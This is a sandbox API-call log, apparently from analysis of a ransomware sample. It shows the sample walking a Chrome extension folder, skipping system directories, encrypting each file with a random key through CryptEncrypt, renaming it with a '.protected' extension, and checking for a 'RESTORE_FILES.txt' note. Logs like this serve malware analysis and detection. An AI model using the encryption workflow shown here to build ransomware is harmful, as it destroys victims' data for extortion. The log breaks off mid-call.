[0083.166] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0083.166] StrStrW (lpFirst="cast_app.js", lpSrch=".rar") returned 0x0 [0083.166] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0083.166] StrStrW (lpFirst="cast_app.js", lpSrch=".zip") returned 0x0 [0083.166] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0083.168] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.168] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0083.168] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.168] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.170] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.170] CloseHandle (hObject=0x164) returned 1 [0083.170] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.protected") returned 171 [0083.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.protected")) returned 1 [0083.171] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="Windows") returned -1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="Program Files") returned -1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="Program Files (x86)") returned -1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="$Recycle.bin") returned 1 [0083.171] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2="System Volume Information") returned -1 [0083.171] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0083.171] StrStrIW (lpFirst="cast_app_redirect.js", lpSrch=".protected") returned 0x0 [0083.171] lstrcmpW (lpString1="cast_app_redirect.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.171] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.171] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0083.173] StrStrW (lpFirst="cast_app_redirect.js", lpSrch=".txt") returned 0x0 [0083.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0083.173] StrStrW (lpFirst="cast_app_redirect.js", lpSrch=".rar") returned 0x0 [0083.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0083.173] StrStrW (lpFirst="cast_app_redirect.js", lpSrch=".zip") returned 0x0 [0083.173] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xf2, lpOverlapped=0x0) returned 1 [0083.174] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.174] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xf2, lpOverlapped=0x0) returned 1 [0083.174] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.174] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.174] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.174] CloseHandle (hObject=0x164) returned 1 [0083.174] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.protected") returned 180 [0083.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.protected")) returned 1 [0083.175] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="Windows") returned -1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="Program Files") returned -1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="Program Files (x86)") returned -1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="$Recycle.bin") returned 1 [0083.175] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2="System Volume Information") returned -1 [0083.175] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0083.175] StrStrIW (lpFirst="chromecast_logo_grey.png", lpSrch=".protected") returned 0x0 [0083.175] lstrcmpW (lpString1="chromecast_logo_grey.png", lpString2="RESTORE_FILES.txt") returned -1 [0083.175] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.175] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0083.176] StrStrW (lpFirst="chromecast_logo_grey.png", lpSrch=".txt") returned 0x0 [0083.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0083.176] StrStrW (lpFirst="chromecast_logo_grey.png", lpSrch=".rar") returned 0x0 [0083.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png") returned 174 [0083.176] StrStrW (lpFirst="chromecast_logo_grey.png", lpSrch=".zip") returned 0x0 [0083.176] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x1bef, lpOverlapped=0x0) returned 1 [0083.181] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffe411, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.182] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x1bef, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x1bef, lpOverlapped=0x0) returned 1 [0083.182] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.182] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.182] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.182] CloseHandle (hObject=0x164) returned 1 [0083.182] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.protected") returned 184 [0083.182] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.protected")) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="Windows") returned -1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="Program Files") returned -1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="Program Files (x86)") returned -1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="$Recycle.bin") returned 1 [0083.183] lstrcmpiW (lpString1="devices.html", lpString2="System Volume Information") returned -1 [0083.183] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0083.183] StrStrIW (lpFirst="devices.html", lpSrch=".protected") returned 0x0 [0083.183] lstrcmpW (lpString1="devices.html", lpString2="RESTORE_FILES.txt") returned -1 [0083.183] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.183] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0083.184] StrStrW (lpFirst="devices.html", lpSrch=".txt") returned 0x0 [0083.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0083.184] StrStrW (lpFirst="devices.html", lpSrch=".rar") returned 0x0 [0083.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0083.184] StrStrW (lpFirst="devices.html", lpSrch=".zip") returned 0x0 [0083.184] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.185] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.185] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x3b, lpOverlapped=0x0) returned 1 [0083.185] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.185] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.186] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.186] CloseHandle (hObject=0x164) returned 1 [0083.186] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.protected") returned 172 [0083.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.protected")) returned 1 [0083.187] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="Windows") returned -1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="Program Files") returned -1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="Program Files (x86)") returned -1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="$Recycle.bin") returned 1 [0083.187] lstrcmpiW (lpString1="index.html", lpString2="System Volume Information") returned -1 [0083.187] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0083.187] StrStrIW (lpFirst="index.html", lpSrch=".protected") returned 0x0 [0083.187] lstrcmpW (lpString1="index.html", lpString2="RESTORE_FILES.txt") returned -1 [0083.187] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.187] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0083.188] StrStrW (lpFirst="index.html", lpSrch=".txt") returned 0x0 [0083.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0083.188] StrStrW (lpFirst="index.html", lpSrch=".rar") returned 0x0 [0083.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html") returned 160 [0083.188] StrStrW (lpFirst="index.html", lpSrch=".zip") returned 0x0 [0083.188] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x828, lpOverlapped=0x0) returned 1 [0083.196] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffff7d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.196] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x828, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x828, lpOverlapped=0x0) returned 1 [0083.196] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.197] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.197] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.197] CloseHandle (hObject=0x164) returned 1 [0083.197] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.protected") returned 170 [0083.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.protected")) returned 1 [0083.198] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="Windows") returned -1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="Program Files") returned -1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="Program Files (x86)") returned -1 [0083.198] lstrcmpiW (lpString1="offers.html", lpString2="$Recycle.bin") returned 1 [0083.198] lstrcmpiW 